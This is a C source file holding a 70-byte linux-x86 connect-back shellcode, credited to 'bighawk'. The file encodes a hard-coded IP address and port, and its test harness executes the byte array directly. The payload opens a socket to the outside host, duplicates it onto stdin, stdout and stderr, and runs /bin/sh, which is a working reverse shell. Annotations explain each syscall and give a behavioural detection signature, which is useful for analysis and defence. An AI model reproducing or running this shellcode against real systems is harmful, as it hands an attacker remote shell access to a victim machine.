/* 70 bytes connect-back shellcode - linux-x86 - linux-2.4
 * 71 bytes connect-back shellcode - linux-x86 - linux-2.2
 * - by bighawk (bighawk@kryptology.org)
 *
 * This shellcode connects back to the host and port given by IPADDR / PORT below (port 10000 by default)
 *
 */

/* Connect-back destination, spliced into the payload at compile time via
 * string-literal concatenation.
 * IPADDR is the dotted quad in network byte order (0x31.0x03.0x03.0x07 = 49.3.3.7).
 * PORT is the big-endian 16-bit port (0x2710 = 10000), matching the header comment.
 * Neither may contain a 0x00 byte: the size printed by main() comes from strlen(). */
#define IPADDR          "\x31\x03\x03\x07"
#define PORT            "\x27\x10"

/* Raw x86 machine code kept as one NUL-free string literal.
 * Reading the mnemonics, the `int 80h` instructions invoke, in order:
 *   1. socketcall (eax=102) with ebx=1 (SYS_SOCKET): socket(2, 1, 0)
 *   2. socketcall (eax=102) with ebx=3 (SYS_CONNECT): connect(fd, {AF_INET, PORT, IPADDR}, 16)
 *   3. dup2 (eax=63) in a loop over ecx = 2, 1, 0, wiring the socket to stderr/stdout/stdin
 *   4. execve (eax=11) of "//bin/sh" (the two pushed dwords spell it in reverse)
 * Detection note: an outbound TCP connect immediately followed by dup2() of that
 * socket onto fds 0-2 and an execve of a shell is the behavioural signature of
 * this payload family; the hard-coded IPADDR/PORT pair is the static indicator. */
char code[] =

   /* --- socket(AF_INET=2, SOCK_STREAM=1, 0) via socketcall --- */
   "\x31\xdb"			// xor	  ebx, ebx
   "\x6a\x66"			// push	  byte 102
   "\x58"			// pop	  eax
   "\x53"			// push	  ebx
   "\x43"			// inc	  ebx
   "\x53"			// push	  ebx
   "\x6a\x02"			// push	  byte 2
   "\x89\xe1"			// mov	  ecx, esp
   "\xcd\x80"			// int	  80h
   /* --- build sockaddr_in on the stack, then connect() via socketcall (ebx=3) --- */
   "\x68"IPADDR			// push	  dword IPADDR
   "\x66\x68"PORT		// push	  word PORT
   "\x43"			// inc	  ebx
   "\x66\x53"			// push	  bx
   "\x89\xe6"			// mov	  esi, esp
   "\x6a\x10"			// push	  byte 16
   "\x56"			// push	  esi
   "\x50"			// push	  eax
   "\x89\xe1"			// mov	  ecx, esp
   "\x43"			// inc	  ebx
   "\xb0\x66"			// mov	  al, 102
   "\xcd\x80"			// int	  80h
   /* --- ecx becomes 3 (old ebx), ebx becomes the socket fd popped from the stack;
    *     loop dup2(fd, ecx) for ecx = 2, 1, 0 until dec ecx goes negative --- */
   "\x87\xcb"			// xchg	  ecx, ebx
   "\x5b"			// pop	  ebx
   "\xb0\x3f"			// mov    al, 63
   "\xcd\x80"			// int    80h
   "\x49"			// dec    ecx
   "\x79\xf9"			// jns    duploop
   /* --- execve("//bin/sh", ["//bin/sh", NULL], edx); eax is 0 after the last dup2 --- */
   "\x50"			// push	  eax
   "\x68\x6e\x2f\x73\x68"	// push	  dword 68732f6eh
   "\x68\x2f\x2f\x62\x69"	// push	  dword 69622f2fh
   "\x89\xe3"			// mov	  ebx, esp
   "\x50"			// push	  eax
   "\x53"			// push	  ebx
   "\x89\xe1"			// mov	  ecx, esp
   "\xb0\x0b"			// mov	  al, 11
#ifdef LINUX2_2
   /* cdq sign-extends eax (0) into edx, so envp is NULL rather than whatever
    * edx held; presumably 2.2 rejected a garbage envp — confirm. */
   "\x99"			// cdq
#endif
   "\xcd\x80";			// int	  80h


/* Test harness: prints the payload length, then transfers control into it.
 * Review notes on the harness itself (code left unchanged):
 *  - implicit `int` return type and no `return` statement: pre-C99 style,
 *    rejected by C99+ compilers;
 *  - printf() and strlen() are used without <stdio.h>/<string.h>, so they
 *    are implicitly declared;
 *  - `%d` paired with a size_t argument is undefined behaviour; `%zu` is the
 *    matching conversion;
 *  - casting a writable data array to a function pointer and calling it only
 *    works where that data segment is executable; under NX/W^X it faults,
 *    which is the mitigation this pattern relies on being absent. */
main() {
  void (*a)() = (void *)code;
  printf("size: %d bytes\n", strlen(code));
  a();
}
